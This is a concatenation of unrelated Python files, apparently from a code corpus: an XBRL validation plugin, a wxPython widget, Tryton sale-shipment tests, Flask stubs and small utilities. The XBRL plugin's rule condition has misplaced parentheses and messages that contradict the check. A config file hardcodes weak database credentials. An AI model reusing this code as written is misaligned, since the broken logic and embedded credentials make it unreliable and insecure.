'http://xbrl.sec.gov/naics/2011-01-31', 'sic': 'http://xbrl.sec.gov/sic/2011-01-31', 'stpr': 'http://xbrl.sec.gov/stpr/2011-01-31', 'us-types': 'http://fasb.org/us-types/2011-01-31', 'nonnum': 'http://www.xbrl.org/dtr/type/non-numeric', 'num': 'http://www.xbrl.org/dtr/type/numeric'} elif 'http://xbrl.us/us-gaap/2009-01-31' in val.modelXbrl.namespaceDocs: nsTbl = {None: 'http://xbrl.us/us-gaap/2009-01-31', 'ar': 'http://xbrl.us/ar/2009-01-31', 'country': 'http://xbrl.us/country/2009-01-31', 'currency': 'http://xbrl.us/currency/2009-01-31', 'exch': 'http://xbrl.us/exch/2009-01-31', 'invest': 'http://xbrl.us/invest/2009-01-31', 'mda': 'http://xbrl.us/mda/2009-01-31', 'mr': 'http://xbrl.us/mr/2009-01-31', 'naics': 'http://xbrl.us/naics/2009-01-31', 'seccert': 'http://xbrl.us/seccert/2009-01-31', 'sec': 'http://xbrl.us/sic/2009-01-31', 'stpr': 'http://xbrl.us/stpr/2009-01-31', 'dei': 'http://xbrl.us/dei/2009-01-31', 'us-types': 'http://xbrl.us/us-types/2009-01-31'} def q(n): return qname(n, nsTbl) ''' matching table localName: ( inclusion(dim, mbr), exclusion(dim,mbr), ruleFunction, error code, err descr ) ''' def isNegative(f): return f.xValue < 0 val.usgaapRules = { q("PaymentsToAcquireNotesReceivable"): ( None, None, isNegative, "xbrlus-cc.cf.nonneg.4291", "may not be nonnegative" ), q("StockholdersEquityIncludingPortionAttributableToNoncontrollingInterest"): ( ((q("StatementEquityComponentsAxis"),q("PreferredStockMember")), ), None, isNegative, "xbrlus-cc.she.nonneg.2", "may not be nonnegative"), 
q("FairValueAssetsMeasuredOnRecurringBasisLoansReceivable"): ( None, ((q("dei:LegalEntityAxis"),q("ConsolidationEliminationsMember")), (q("StatementBusinessSegmentsAxis"),q("ConsolidationEliminationsMember")), (q("StatementBusinessSegmentsAxis"),q("BusinessIntersegmentEliminationsMember")), (q("SegmentReportingInformationBySegmentAxis"),q("BusinessIntersegmentEliminationsMember")), (q("StatementGeographicalAxis"),q("GeographicalIntersegmentEliminationsMember")), (q("ErrorCorrectionsAndPriorPeriodAdjustmentsRestatementByRestatementPeriodAndAmountAxis"),q("RestatementAdjustmentMember")), (q("NewAccountingPronouncementsOrChangeInAccountingPrincipleByTypeOfChangeAxis"),q("RestatementAdjustmentMember")), (q("StatementScenarioAxis"),q("ScenarioAdjustmentMember")), (q("EffectOfFourthQuarterEventsByTypeAxis"),q("YearEndAdjustmentMember")), ), isNegative, "xbrlus-cc.fv.nonneg.9329", "may not be nonnegative") } def factCheck(val, fact): if fact.qname in val.usgaapRules: inclDimMems, exclDimMems, ruleFunction, errCode, descr = val.usgaapRules[fact.qname] if (all(fact.context.dimMemberQname(dimMem[0]) == dimMem[1]) for dimMem in (inclDimMems or []) and not any(fact.context.dimMemberQname(dimMem[0]) == dimMem[1]) for dimMem in (exclDimMems or []) and ruleFunction(fact)): val.modelXbrl.error(errCode, _("%(fact)s in context %(contextID)s %(descr)s"), modelObject=fact, fact=fact.qname, contextID=fact.contextID, descr=descr) def final(val): pass __pluginInfo__ = { # Do not use _( ) in pluginInfo itself (it is applied later, after loading 'name': 'US-GAAP Consistency Tests', 'version': '0.9', 'description': '''US-GAAP consistency tests. Includes non-negative rules.''', 'license': 'Apache-2', 'author': '<NAME>', 'copyright': '(c) Copyright 2012 Mark V Systems Limited, All rights reserved.', # classes of mount points (required) 'Validate.EFM.Start': setup, 'Validate.EFM.Fact': factCheck, 'Validate.EFM.Finally': final } ########################################################################## # MediPy - Copyright (C) Universite de Strasbourg # Distributed under the terms of the CeCILL-B license, as published by # the CEA-CNRS-INRIA. Refer to the LICENSE file or to # http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html # for details. ########################################################################## import math import wx import medipy.base class ImageSerie(wx.Panel, medipy.base.Observable): """ Control allowing the user to choose an item from a list of objects of type "list of medipy.base.Image". If output is True, then a "(new)" checkbox will be displayed ; when checked, the value of the control will be set to None, and it will be the caller's responsibility to perform the necessary actions. If may_be_empty is True, then a "(none)" checkbox will be displayed ; when checked, the value of the control will be set to None. 
""" def __init__(self, parent, choices, value=None, output=False, output_checked=False, may_be_empty=False, may_be_empty_checked=False, *args, **kwargs): self._choices = None self._value = None self._default_value = None # Initialize wx.Panel.__init__(self, parent, *args, **kwargs) medipy.base.Observable.__init__(self, ["value"]) # Widgets self._new_checkbox = wx.CheckBox(self, label="(new)") self._empty_checkbox = wx.CheckBox(self, label="(none)") # Layout sizer = wx.BoxSizer(wx.VERTICAL) self._radiobuttons_sizer = wx.GridSizer() sizer.Add(self._empty_checkbox) sizer.Add(self._radiobuttons_sizer) sizer.Add(self._new_checkbox) self.SetSizer(sizer) # Events self._new_checkbox.Bind(wx.EVT_CHECKBOX, self.OnNewCheckBox) self._empty_checkbox.Bind(wx.EVT_CHECKBOX, self.OnEmptyCheckBox) self.value = value self.default_value = value self.choices = choices self.output = output self.output_checked = output_checked self.may_be_empty = may_be_empty self.may_be_empty_checked = may_be_empty_checked self.validate() def validate(self): valid = (self.output_checked or self.may_be_empty_checked or (self._value is not None and self._value in [id(x) for x in self.choices])) if valid : self.SetBackgroundColour(None) else : self.SetBackgroundColour(wx.RED) return valid def reset(self): """ Reset the current choice to the default value, uncheck the "(new)" and "(none)" checkboxes. """ self.output_checked = False self.may_be_empty_checked = False self.value = self.default_value self.validate() def update_gui(self): """ Update the GUI to reflect the current state of the control (value, choices, output parameters and may_be_empty parameters). """ if self._choices is None : return self._radiobuttons_sizer.Clear(True) # Re-shape the sizer to be as square as possible nb_objects = len(self.choices) rows = max(math.sqrt(len(self.choices)),1) rows = math.ceil(rows) self._radiobuttons_sizer.SetRows(rows) self._radiobuttons_sizer.SetCols(rows) if len(self.choices) == 0 : label = wx.StaticText(self, label="(no image loaded)") font = label.GetFont() font.SetStyle(wx.FONTSTYLE_ITALIC) label.SetFont(font) self._radiobuttons_sizer.Add(label, 1, wx.EXPAND) else : style=wx.RB_GROUP for i, choice in enumerate(self.choices) : button = wx.RadioButton(self, -1, str(i+1), style=style) style=0 button.Bind(wx.EVT_RADIOBUTTON, self.OnRadioButton) self._radiobuttons_sizer.Add(button, 0) is_image_list = ( isinstance(choice, (list, medipy.base.ObservableList)) and all([isinstance(x, medipy.base.Image) for x in choice])) button.Enable(is_image_list and not self.output_checked and not self.may_be_empty_checked) ids = [id(x) for x in self.choices] try : index = ids.index(self._value) except ValueError : # No such value, just keep the current button checked pass else : button = self._radiobuttons_sizer.GetChildren()[index].GetWindow() button.SetValue(True) self.Layout() ############## # Properties # ############## def _get_value(self): """ The chosen Image from the list, or None if either the "(new)" checkbox or the "(none)" checkbox is checked. """ if self._value is None : return self._value else : ids = [id(x) for x in self.choices] index = ids.index(self._value) return self._choices[index] def _set_value(self, value): if value is not None : ids = [id(x) for x in self.choices] if id(value) in ids : self._value = id(value) else : self._value = None else : self._value = None self.update_gui() self.validate() self.notify_observers("value") def _get_default_value(self): """ The default value of the control, used when resetting. 
""" return self._default_value def _set_default_value(self, default_value): if default_value is not None : ids = [id(x) for x in self.choices] if id(default_value) in ids : self._default_value = id(default_value) else : self._default_value = None else : self._default_value = None def _get_choices(self): """ The list of choices displayed by the control. If this is an ObservableList, then the control will become an observer of the list and update when the list is modified. Otherwise, update_gui must be called explicitly. """ return self._choices def _set_choices(self, choices): if isinstance(self._choices, medipy.base.ObservableList) : self._choices.remove_observer("any", self._on_choices_modified) self._choices = choices if isinstance(self._choices, medipy.base.ObservableList) : self._choices.add_observer("any", self._on_choices_modified) self.update_gui() self.validate() def _get_output(self): """ The visibility of the "(new)" checkbox. """ return self._new_checkbox.IsShown() def _set_output(self, output): self._new_checkbox.Show(output) self.Layout() self.validate() def _get_output_checked(self): """ Is the "(new)" checkbox checked ? """ return self._new_checkbox.IsShown() and self._new_checkbox.IsChecked() def _set_output_checked(self, output_checked): if output_checked : self.value = None else : if self.choices : self.value = self.choices[0] else : self.value = None self._new_checkbox.SetValue(output_checked) self.update_gui() self.validate() def _get_may_be_empty(self): """ The visibility of the "(none)" checkbox. """ return self._empty_checkbox.IsShown() def _set_may_be_empty(self, may_be_empty): self._empty_checkbox.Show(may_be_empty) self.Layout() self.validate() def _get_may_be_empty_checked(self): """ Is the "(none)" checkbox checked ? """ return self._empty_checkbox.IsShown() and self._empty_checkbox.IsChecked() def _set_may_be_empty_checked(self, may_be_empty_checked): if may_be_empty_checked : self.value = None else : if self.choices : self.value = self.choices[0] else : self.value = None self._empty_checkbox.SetValue(may_be_empty_checked) self.update_gui() self.validate() value = property(_get_value, _set_value) default_value = property(_get_default_value, _set_default_value) choices = property(_get_choices, _set_choices) output = property(_get_output, _set_output) output_checked = property(_get_output_checked, _set_output_checked) may_be_empty = property(_get_may_be_empty, _set_may_be_empty) may_be_empty_checked = property(_get_may_be_empty_checked, _set_may_be_empty_checked) ################## # Event handlers # ################## def OnRadioButton(self, event): index = int(event.GetEventObject().GetLabel())-1 self._set_value(self._choices[index]) def OnNewCheckBox(self, event): if self.output_checked : self.value = None else : if self._choices : self.value = self._choices[0] else : self.value = None self.update_gui() self.validate() event.Skip() def OnEmptyCheckBox(self, event): if self.may_be_empty_checked : self.value = None else : if self._choices : self.value = self._choices[0] else : self.value = None self.update_gui() self.validate() event.Skip() def _on_choices_modified(self, event): if self.choices and not self.output_checked and not self.may_be_empty_checked : self.value = self.choices[0] self.update_gui() self.validate() """Code for reading and writing scansion text-format protocol buffers.""" from google.protobuf import text_format # type: ignore from . import scansion_pb2 # type: ignore # TODO(kbg): Add read and write functions for Verse messages, if needed. 
def read_document(path: str) -> scansion_pb2.Document: """Reads document message from file. Args: path: file path to read from. Returns: A parsed document message. """ document = scansion_pb2.Document() with open(path, "r") as source: text_format.ParseLines(source, document) return document def write_document(document: scansion_pb2.Document, path: str) -> None: """Writes docuemnt message to file. Args: document: the document message to write path: file path to write to. """ with open(path, "w") as sink: text_format.PrintMessage(document, sink, as_utf8=True) <reponame>JoelBondurant/RandomCodeSamples<filename>python/deploySQL.py # A script to execute all the SQL DDL scripts which are needed in addition to what JPA does. import pyodbc, os, sys, time if (len(sys.argv) <= 1): databaseServer = 'SASERVER1\SQL2008R2' databaseName = 'imDev' userName = 'REMOVED' password = '<PASSWORD>' scriptPath = '.' else: [scriptPath,databaseServer,databaseName,userName,password] = sys.argv[1:] os.chdir(scriptPath) dbConnectionString = "DRIVER={SQL Server};" dbConnectionString += "SERVER=" + databaseServer + ";" dbConnectionString += "DATABASE=" + databaseName + ";" dbConnectionString += "UID=" + userName + ";" dbConnectionString += "PWD=" + password #print(dbConnectionString) cnxn = pyodbc.connect(dbConnectionString) printSQL = False printNothing = True printAllExceptions = False tablePath = "../SQL/Tables/" viewPath = "../SQL/Views/" procPath = "../SQL/StoredProcs/" functionPath = "../SQL/Functions/" def executeSQL(fileName, sql): try: cursor = cnxn.cursor() cursor.execute(sql) cursor.close() cnxn.commit() except: err = sys.exc_info() if ((not printNothing) and printAllExceptions): print(err) elif ((not printNothing) and (-1 == str(err[1]).find("already"))): print(err) def executePath(path): fileNames = os.listdir(path) for fileName in fileNames: if (not fileName.endswith(".sql")): continue f = open(path + fileName, "r") sql = f.read() f.close() msg = "Executing " + fileName if (printSQL): msg += ":\n" + sql if (not printNothing): print(msg) executeSQL(fileName, sql) executePath(tablePath) executePath(viewPath) executePath(procPath) executePath(functionPath) cnxn.close() <reponame>chauanphu/P-Wallet<gh_stars>0 import imp from sqlalchemy import create_engine from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import sessionmaker SQLALCHEMY_DATABASE_URL = 'postgresql://admin:1@db:5432/billiard' engine = create_engine( SQLALCHEMY_DATABASE_URL ) sessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine) Base = declarative_base()# -*- coding: utf-8 -*- """ tests/test_views_depends.py :copyright: (C) 2014 by Openlabs Technologies & Consulting (P) Limited :license: BSD, see LICENSE for more details. """ import unittest from datetime import date from decimal import Decimal from trytond.tests.test_tryton import DB_NAME, USER, CONTEXT, POOL import trytond.tests.test_tryton from trytond.transaction import Transaction class TestShipmentCostCap(unittest.TestCase): """ Test Shipment Cost Cap """ def setUp(self): """ Set up data used in the tests. 
""" trytond.tests.test_tryton.install_module('sale_shipment_cost_cap') self.Currency = POOL.get('currency.currency') self.Company = POOL.get('company.company') self.Party = POOL.get('party.party') self.User = POOL.get('res.user') self.Country = POOL.get('country.country') self.SubDivision = POOL.get('country.subdivision') self.Carrier = POOL.get('carrier') def _create_coa_minimal(self, company): """Create a minimal chart of accounts """ AccountTemplate = POOL.get('account.account.template') Account = POOL.get('account.account') account_create_chart = POOL.get( 'account.create_chart', type="wizard" ) account_template, = AccountTemplate.search( [('parent', '=', None)] ) session_id, _, _ = account_create_chart.create() create_chart = account_create_chart(session_id) create_chart.account.account_template = account_template create_chart.account.company = company create_chart.transition_create_account() receivable, = Account.search([ ('kind', '=', 'receivable'), ('company', '=', company), ]) payable, = Account.search([ ('kind', '=', 'payable'), ('company', '=', company), ]) create_chart.properties.company = company create_chart.properties.account_receivable = receivable create_chart.properties.account_payable = payable create_chart.transition_create_properties() def _get_account_by_kind(self, kind, company=None, silent=True): """Returns an account with given spec :param kind: receivable/payable/expense/revenue :param silent: dont raise error if account is not found """ Account = POOL.get('account.account') Company = POOL.get('company.company') if company is None: company, = Company.search([], limit=1) accounts = Account.search([ ('kind', '=', kind), ('company', '=', company) ], limit=1) if not accounts and not silent: raise Exception("Account not found") return accounts[0] if accounts else False def _create_payment_term(self): """Create a simple payment term with all advance """ PaymentTerm = POOL.get('account.invoice.payment_term') return PaymentTerm.create([{ 'name': 'Direct', 'lines': [('create', [{'type': 'remainder'}])] }])[0] def setup_defaults(self): """ Setup the defaults """ User = POOL.get('res.user') Uom = POOL.get('product.uom') Template = POOL.get('product.template') Product = POOL.get('product.product') SaleConfig = POOL.get('sale.configuration') self.usd, = self.Currency.create([{ 'name': 'US Dollar', 'code': 'USD', 'symbol': '$', }]) with Transaction().set_context(company=None): self.party, = self.Party.create([{ 'name': 'Openlabs', }]) self.company, = self.Company.create([{ 'party': self.party.id, 'currency': self.usd }]) User.write( [User(USER)], { 'main_company': self.company.id, 'company': self.company.id, } ) self._create_coa_minimal(company=self.company.id) self.account_revenue = self._get_account_by_kind('revenue') self.account_expense = self._get_account_by_kind('expense') self._create_payment_term() carrier_party, = self.Party.create([{ 'name': 'Carrier Party', }]) self.party1, = self.Party.create([{ 'name': 'Test party', 'addresses': [('create', [{ 'city': 'Melbourne', }])], }]) self.uom, = Uom.search([('name', '=', 'Unit')]) self.template1, = Template.create([{ 'name': 'product', 'type': 'goods', 'list_price': Decimal('10'), 'cost_price': Decimal('5'), 'default_uom': self.uom.id, 'salable': True, 'sale_uom': self.uom.id, 'account_revenue': self.account_revenue.id, }]) self.template2, = Template.create([{ 'name': 'product2', 'type': 'goods', 'list_price': Decimal('20'), 'cost_price': Decimal('5'), 'default_uom': self.uom.id, 'salable': True, 'sale_uom': self.uom.id, 
'account_revenue': self.account_revenue.id, }]) self.product1, = Product.create([{ 'template': self.template1.id, }]) self.product2, = Product.create([{ 'template': self.template2.id, }]) self.shipping_template, = Template.create([{ 'name': 'shipment', 'type': 'service', 'list_price': Decimal('20'), 'cost_price': Decimal('5'), 'default_uom': self.uom.id, 'salable': True, 'sale_uom': self.uom.id, 'account_revenue': self.account_revenue.id, }]) self.shipping_product, = Product.create([{ 'template': self.shipping_template.id, }]) self.carrier_product_temp, = Template.create([{ 'name': 'carrier_produict', 'type': 'service', 'list_price': Decimal('1'), 'cost_price': Decimal('1'), 'default_uom': self.uom.id, 'salable': True, 'sale_uom': self.uom.id, 'account_revenue': self.account_revenue.id, }]) carrier_product, = Product.create([{ 'template': self.carrier_product_temp.id, }]) self.carrier, = self.Carrier.create([{ 'party': carrier_party, 'carrier_product': carrier_product, }]) SaleConfig.write([SaleConfig(1)], { 'sale_carrier': self.carrier.id, 'sale_invoice_method': 'shipment', 'sale_shipment_method': 'order', 'sale_shipment_cost_method': 'shipment_capped', }) def test0010_single_shipment_cost(self): """ Check if single invoice on single shipment """ with Transaction().start(DB_NAME, USER, context=CONTEXT): Sale = POOL.get('sale.sale') ShipmentOut = POOL.get('stock.shipment.out') self.setup_defaults() with Transaction().set_context({'company': self.company.id}): shipment_cost = Decimal('30') sale, = Sale.create([{ 'reference': 'Sale1', 'sale_date': date.today(), 'invoice_address': self.party1.addresses[0].id, 'shipment_address': self.party1.addresses[0].id, 'party': self.party1.id, 'carrier': self.carrier.id, 'invoice_method': 'shipment', 'shipment_method': 'order', 'shipment_cost_method': 'shipment_capped', 'lines': [ ('create', [{ 'type': 'line', 'quantity': 5, 'unit': self.uom, 'unit_price': 10, 'description': 'Test description1', 'product': self.product1.id, }, { 'type': 'line', 'quantity': 2, 'unit': self.uom, 'unit_price': 20, 'description': 'Test description1', 'product': self.product1.id, }, { 'type': 'line', 'quantity': 1, 'unit': self.uom, 'unit_price': shipment_cost, 'description': 'Shipping', 'product': self.shipping_product.id, 'shipment_cost': shipment_cost }]) ] }]) Sale.quote([sale]) Sale.confirm([sale]) Sale.process([sale]) self.assertEqual(sale.state, 'processing') self.assertEqual(len(sale.invoices), 0) shipment, = sale.shipments shipment.cost = Decimal(25) shipment.save() ShipmentOut.assign([shipment]) ShipmentOut.pack([shipment]) ShipmentOut.done([shipment]) self.assertEqual(shipment.state, 'done') self.assertEqual(len(sale.invoices), 1) self.assertEqual(sale.invoices[0].total_amount, Decimal('115')) def test0020_multiple_shipment_cost(self): """ Check if multiple invoice on multiple shipment Case 2: Sale 1 with 2 shipments and each costs 15 Test: Invoice total is (50 + 15) and (40 + 15) = 120 """ with Transaction().start(DB_NAME, USER, context=CONTEXT): Sale = POOL.get('sale.sale') ShipmentOut = POOL.get('stock.shipment.out') self.setup_defaults() with Transaction().set_context({'company': self.company.id}): total_shipment_cost = Decimal('30') sale, = Sale.create([{ 'reference': 'Sale1', 'sale_date': date.today(), 'invoice_address': self.party1.addresses[0].id, 'shipment_address': self.party1.addresses[0].id, 'party': self.party1.id, 'carrier': self.carrier.id, 'invoice_method': 'shipment', 'shipment_method': 'order', 'shipment_cost_method': 'shipment_capped', 'lines': [ 
('create', [{ 'type': 'line', 'quantity': 5, 'unit': self.uom, 'unit_price': 10, 'description': 'Test description1', 'product': self.product1.id, }, { 'type': 'line', 'quantity': 2, 'unit': self.uom, 'unit_price': 20, 'description': 'Test description1', 'product': self.product2.id, }, { 'type': 'line', 'quantity': 1, 'unit': self.uom, 'unit_price': total_shipment_cost, 'description': 'Shipping', 'product': self.shipping_product.id, 'shipment_cost': total_shipment_cost }]) ] }]) Sale.quote([sale]) Sale.confirm([sale]) Sale.process([sale]) self.assertEqual(sale.state, 'processing') self.assertEqual(len(sale.invoices), 0) shipment1, = sale.shipments shipment1.cost = Decimal(15) shipment1.save() self.assertEqual(len(shipment1.outgoing_moves), 2) # Delete a shipment Move ShipmentOut.write([shipment1], { 'moves': [('remove', [shipment1.inventory_moves[0].id])] }) ShipmentOut.assign([shipment1]) ShipmentOut.pack([shipment1]) ShipmentOut.done([shipment1]) # Select other shipment shipment2, = filter( lambda s: s.id != shipment1.id, sale.shipments ) shipment2.cost = Decimal(15) shipment2.save() ShipmentOut.assign([shipment2]) ShipmentOut.pack([shipment2]) ShipmentOut.done([shipment2]) for shipment in sale.shipments: self.assertEqual(shipment.state, 'done') self.assertEqual(len(sale.invoices), 2) total_amount = sum([ inv.total_amount for inv in sale.invoices ]) self.assertEqual(total_amount, Decimal('120')) def test0030_multiple_shipment_cost(self): """ Check if single invoice on single shipment Case 3: Sale 1 with 3 shipment and each costs 15 Test: Invoice total is (50 + 15) + (40 + 15) + (60 + 0) = 180 """ with Transaction().start(DB_NAME, USER, context=CONTEXT): Sale = POOL.get('sale.sale') ShipmentOut = POOL.get('stock.shipment.out') self.setup_defaults() with Transaction().set_context({'company': self.company.id}): total_shipment_cost = Decimal('30') sale, = Sale.create([{ 'reference': 'Sale1', 'sale_date': date.today(), 'invoice_address': self.party1.addresses[0].id, 'shipment_address': self.party1.addresses[0].id, 'party': self.party1.id, 'carrier': self.carrier.id, 'invoice_method': 'shipment', 'shipment_method': 'order', 'shipment_cost_method': 'shipment_capped', 'lines': [ ('create', [{ 'type': 'line', 'quantity': 5, 'unit': self.uom, 'unit_price': 10, 'description': 'Test description1', 'product': self.product1.id, }, { 'type': 'line', 'quantity': 2, 'unit': self.uom, 'unit_price': 20, 'description': 'Test description1', 'product': self.product2.id, }, { 'type': 'line', 'quantity': 3, 'unit': self.uom, 'unit_price': 20, 'description': 'Test description2', 'product': self.product2.id, }, { 'type': 'line', 'quantity': 1, 'unit': self.uom, 'unit_price': total_shipment_cost, 'description': 'Shipping', 'product': self.shipping_product.id, 'shipment_cost': total_shipment_cost }]) ] }]) Sale.quote([sale]) Sale.confirm([sale]) Sale.process([sale]) self.assertEqual(sale.state, 'processing') self.assertEqual(len(sale.invoices), 0) shipment1, = sale.shipments shipment1.cost = Decimal(15) shipment1.save() self.assertEqual(len(shipment1.outgoing_moves), 3) # Delete a shipment Move ShipmentOut.write([shipment1], { 'moves': [('remove', [ shipment1.inventory_moves[0].id, shipment1.inventory_moves[1].id ])] }) ShipmentOut.assign([shipment1]) ShipmentOut.pack([shipment1]) ShipmentOut.done([shipment1]) # Select other shipment shipment2, = filter( lambda s: s.id != shipment1.id, sale.shipments ) shipment2.cost = Decimal(15) shipment2.save() self.assertEqual(len(shipment2.outgoing_moves), 2) # Delete a 
shipment Move ShipmentOut.write([shipment2], { 'moves': [('remove', [ shipment2.inventory_moves[0].id, ])] }) ShipmentOut.assign([shipment2]) ShipmentOut.pack([shipment2]) ShipmentOut.done([shipment2]) # Select other shipment shipment3, = filter( lambda s: s.id not in [shipment2.id, shipment1.id], sale.shipments ) shipment3.cost = Decimal(15) shipment3.save() self.assertEqual(len(shipment3.outgoing_moves), 1) ShipmentOut.assign([shipment3]) ShipmentOut.pack([shipment3]) ShipmentOut.done([shipment3]) for shipment in sale.shipments: self.assertEqual(shipment.state, 'done') self.assertEqual(len(sale.invoices), 3) total_amount = sum([ inv.total_amount for inv in sale.invoices ]) self.assertEqual(total_amount, Decimal('180')) def test0040_shipment_cost_on_order(self): """ Check shipment cost method is order """ with Transaction().start(DB_NAME, USER, context=CONTEXT): Sale = POOL.get('sale.sale') ShipmentOut = POOL.get('stock.shipment.out') self.setup_defaults() with Transaction().set_context({'company': self.company.id}): shipment_cost = Decimal('30') sale, = Sale.create([{ 'reference': 'Sale1', 'sale_date': date.today(), 'invoice_address': self.party1.addresses[0].id, 'shipment_address': self.party1.addresses[0].id, 'party': self.party1.id, 'carrier': self.carrier.id, 'invoice_method': 'shipment', 'shipment_method': 'order', 'shipment_cost_method': 'order', 'lines': [ ('create', [{ 'type': 'line', 'quantity': 5, 'unit': self.uom, 'unit_price': 10, 'description': 'Test description1', 'product': self.product1.id, }, { 'type': 'line', 'quantity': 2, 'unit': self.uom, 'unit_price': 20, 'description': 'Test description1', 'product': self.product2.id, }, { 'type': 'line', 'quantity': 1, 'unit': self.uom, 'unit_price': shipment_cost, 'description': 'Shipping', 'product': self.shipping_product.id, 'shipment_cost': shipment_cost }]) ] }]) Sale.quote([sale]) Sale.confirm([sale]) Sale.process([sale]) self.assertEqual(sale.state, 'processing') self.assertEqual(len(sale.invoices), 1) # Just the shipment cost invoice = sale.invoices[0] self.assertEqual(invoice.total_amount, Decimal('30')) shipment, = sale.shipments shipment.cost = Decimal(30) shipment.save() self.assertEqual(len(shipment.outgoing_moves), 2) ShipmentOut.assign([shipment]) ShipmentOut.pack([shipment]) ShipmentOut.done([shipment]) self.assertEqual(len(sale.invoices), 2) for inv in sale.invoices: if inv.id == invoice.id: # Ignore previous invoice continue # Sale Amount self.assertEqual(inv.total_amount, Decimal('90')) break else: self.fail('No invoice for shipment') def test0050_shipment_cost_on_shipment(self): """ Check shipment cost method is shipment """ with Transaction().start(DB_NAME, USER, context=CONTEXT): Sale = POOL.get('sale.sale') ShipmentOut = POOL.get('stock.shipment.out') self.setup_defaults() with Transaction().set_context({'company': self.company.id}): shipment_cost = Decimal('30') sale, = Sale.create([{ 'reference': 'Sale1', 'sale_date': date.today(), 'invoice_address': self.party1.addresses[0].id, 'shipment_address': self.party1.addresses[0].id, 'party': self.party1.id, 'carrier': self.carrier.id, 'invoice_method': 'shipment', 'shipment_method': 'order', 'shipment_cost_method': 'shipment', 'lines': [ ('create', [{ 'type': 'line', 'quantity': 5, 'unit': self.uom, 'unit_price': 10, 'description': 'Test description1', 'product': self.product1.id, }, { 'type': 'line', 'quantity': 2, 'unit': self.uom, 'unit_price': 20, 'description': 'Test description1', 'product': self.product2.id, }, { 'type': 'line', 'quantity': 1, 'unit': 
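# --- Illustrative sketch (not part of the module under test) ---
# The 'shipment_capped' cases above all follow the same rule: each shipment is
# invoiced at its actual cost, but the cumulative shipping charged across a
# sale's invoices is capped at the amount quoted on the order (Decimal('30')
# here).  A minimal, self-contained model of that rule, using hypothetical
# plain numbers rather than Tryton records:

from decimal import Decimal


def capped_shipping_charges(quoted_cost, shipment_costs):
    """Return the shipping amount to invoice for each shipment.

    ``quoted_cost`` is the shipment cost quoted on the sale order and
    ``shipment_costs`` are the actual costs of the shipments, in the order
    they are done.  Each shipment is charged at cost until the quoted amount
    is exhausted; anything beyond the cap is charged at zero.
    """
    remaining = quoted_cost
    charges = []
    for cost in shipment_costs:
        charge = min(cost, remaining)
        charges.append(charge)
        remaining -= charge
    return charges


# Reproduces the expectations asserted in the tests above:
assert capped_shipping_charges(Decimal('30'), [Decimal('25')]) == [Decimal('25')]  # 90 + 25 = 115
assert capped_shipping_charges(Decimal('30'), [Decimal('15'), Decimal('15')]) == \
    [Decimal('15'), Decimal('15')]                                                  # 90 + 30 = 120
assert capped_shipping_charges(Decimal('30'), [Decimal('15')] * 3) == \
    [Decimal('15'), Decimal('15'), Decimal('0')]                                    # 150 + 30 = 180
# --- end sketch ---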
self.uom, 'unit_price': shipment_cost, 'description': 'Shipping', 'product': self.shipping_product.id, 'shipment_cost': shipment_cost }]) ] }]) Sale.quote([sale]) Sale.confirm([sale]) Sale.process([sale]) self.assertEqual(sale.state, 'processing') self.assertEqual(len(sale.invoices), 0) shipment, = sale.shipments shipment.cost = Decimal(30) shipment.save() self.assertEqual(len(shipment.outgoing_moves), 2) ShipmentOut.assign([shipment]) ShipmentOut.pack([shipment]) ShipmentOut.done([shipment]) self.assertEqual(len(sale.invoices), 1) # Just the shipment cost self.assertEqual(sale.invoices[0].total_amount, Decimal('120')) def suite(): """ Define suite """ test_suite = trytond.tests.test_tryton.suite() test_suite.addTests( unittest.TestLoader().loadTestsFromTestCase(TestShipmentCostCap) ) return test_suite if __name__ == '__main__': unittest.TextTestRunner(verbosity=2).run(suite()) ######################### # Author: <NAME> # # Helper Functions ######################### def teampreview_performance(mon_a, mon_b): # We evaluate the performance on mon_a against mon_b as its type advantage a_on_b = b_on_a = -np.inf for type_ in mon_a.types: if type_: a_on_b = max(a_on_b, type_.damage_multiplier(*mon_b.types)) # We do the same for mon_b over mon_a for type_ in mon_b.types: if type_: b_on_a = max(b_on_a, type_.damage_multiplier(*mon_a.types)) # Our performance metric is the different between the two return a_on_b - b_on_a import feedparser from urllib.parse import urlencode from upwork_rss.dto import JobPosition class UpworkRSS: _jobs_rss_url: str = "https://www.upwork.com/ab/feed/jobs/rss" class SortParam: newest = "recency" relevance = "relevance+desc" client_spend = "client_total_charge+desc" client_rating = "client_rating+desc" def __init__(self, security_token: str): self.security_token = security_token def search(self, query: str = None, *skill_ids: int, offset: int = 0, limit: int = 25, sort_by: str = SortParam.newest): params = { "paging": f"{offset};{limit}", "securityToken": self.security_token, "api_params": 1, "query": query if query else "", "ontology_skill_uid": ",".join(map(str, skill_ids)) if skill_ids else "", "sort": sort_by } url = f"{self._jobs_rss_url}?{urlencode(params)}" return list(map(JobPosition.from_feed, feedparser.parse(url).get("entries"))) #coding:utf-8 from flask import Flask from flask_sqlalchemy import SQLAlchemy from flask_debugtoolbar import DebugToolbarExtension from flask_caching import Cache app = Flask(__name__) app.config.from_pyfile('settings.py') # 从settings.py中导入设置 # 去除jinja模板中的空白行 app.jinja_env.trim_blocks = True app.jinja_env.lstrip_blocks = True db = SQLAlchemy(app) toolbar = DebugToolbarExtension(app) cache = Cache(app) from spwb import views, errors, commands <reponame>HunterLC/FARSystem from flask import render_template from app import init_app from flask import request from app.views.actor import get_frequent_cooperation_by_id app = init_app() # 创建app @app.route('/',methods=['GET','POST']) def login(): return render_template("login.html",errors="") if __name__ == '__main__': app.run() <reponame>jdayton3/Geney import json import io import csv import msgpack import pandas as pd from shapeshifter.files import SSFile class GeneyQuery: """ Represents and handles queries stored by Geney as JSON file """ def __init__(self, geney_file_collection, json_filter): """ Initializes GeneyQuery object. 
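# --- Illustrative sketch (standard library only) ---
# UpworkRSS.search above assembles its feed URL by urlencoding a flat parameter
# dict onto the RSS endpoint.  The same construction with a hypothetical
# security token, so the resulting query string is visible without hitting the
# network or needing feedparser:

from urllib.parse import urlencode

params = {
    "paging": "0;25",                   # offset;limit, as built in search()
    "securityToken": "EXAMPLE_TOKEN",   # placeholder, not a real token
    "api_params": 1,
    "query": "python scraping",
    "ontology_skill_uid": "",           # empty when no skill ids are given
    "sort": "recency",                  # SortParam.newest
}
url = "https://www.upwork.com/ab/feed/jobs/rss?" + urlencode(params)
print(url)
# --- end sketch ---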
